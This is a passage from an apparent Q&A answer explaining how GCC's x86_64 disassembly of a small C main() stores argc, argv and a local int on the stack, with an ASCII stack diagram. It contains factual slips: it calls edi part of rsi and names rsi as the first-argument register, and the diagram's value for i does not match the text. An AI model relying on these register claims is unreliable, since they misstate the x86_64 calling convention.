mov %edi, -0x14(%rbp): This moves the content of register edi into our local variables frame. Specifically, into offset -0x14
mov %rsi, -0x20(%rbp): Same here. But this time it saves rsi. This is part of the x86_64 calling convention (which now uses registers instead of pushing everything on stack like x86_32), but instead of keeping them in registers, we free the registers by saving the contents in our local variables frame - register are way faster and are the only way the CPU can actually process anything, so the more free registers we have, the better.
Note: edi is the 4-bytes part of the rsi register and from the x86_64 calling convention, we know that rsi register is used for the first argument. main's first argument is int argc, so it makes sense we use a 4-byte register to store it. rsi is the second argument, effectively the address of a pointer to pointer to chars (**argv). So, in 64bit architectures, that fits perfectly into a 64bit register.
<+11>: movl $0xbc614e,-0x4(%rbp): This is the actual line int i = 12345678 (0xbc614e = 12345678d). Now, note that the way we "move" that value is very similar to how we stored the main arguments. We use offset -0x4(%rbp) to store it memory, on the "local variables frame" (this answers your question on where it gets stored).
mov $0x0, %eax; pop %rbp; retq: Again, dull stuff to clear up the frame pointer and return (end the program since we're in main).
Note that on the second example, the only difference is the line <+11>: movl $0x0,-0x4(%rbp), which effectively stores the value zero - in C words, int i = 0.
So, by these instructions you can see that the main function of both programs gets translated to assembly in the exact the same way, so their sizes are the same in the end. (Assuming you compiled them the same way, because the compiler also puts lots of other things in the binaries, like data, library functions, etc. In linux, you can get a full disassembly dump using objdump -D program.
Note 2: In these examples, you cannot see how the computer subtracts values from rsp in order to allocate stack space, but that's how it's normally done.
Stack Representation
The stack would be like this for both cases (only the value of i would change, or the value at -0x4(%rbp))
| ~~~ | Higher Memory addresses
| |
+------------------+ <--- Address 0x8(%rbp)
| RETURN ADDRESS |
+------------------+ <--- Address 0x0(%rbp) // instruction push %rbp
| previous rbp |
+------------------+ <--- Address -0x4(%rbp)
| i=0x11223344 |
+------------------+ <---- Address -0x14(%rbp)
| argc |
+------------------+ <---- address -0x20(%rbp)
| argv |
+------------------+
| |
+~~~~~~~~~~~~~~~~~~+ Lower memory addresses
Note 3: The direction to where the stack grows depends on your architecture. How data gets written in memory also depends on your architecture.
Resources
What are the calling conventions for UNIX & Linux system calls on x86-64
Call Stack
GCC Optimization Options
Understanding the Stack
How does the stack work in assembly language?
x86_64 : is stack frame pointer almost useless?

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight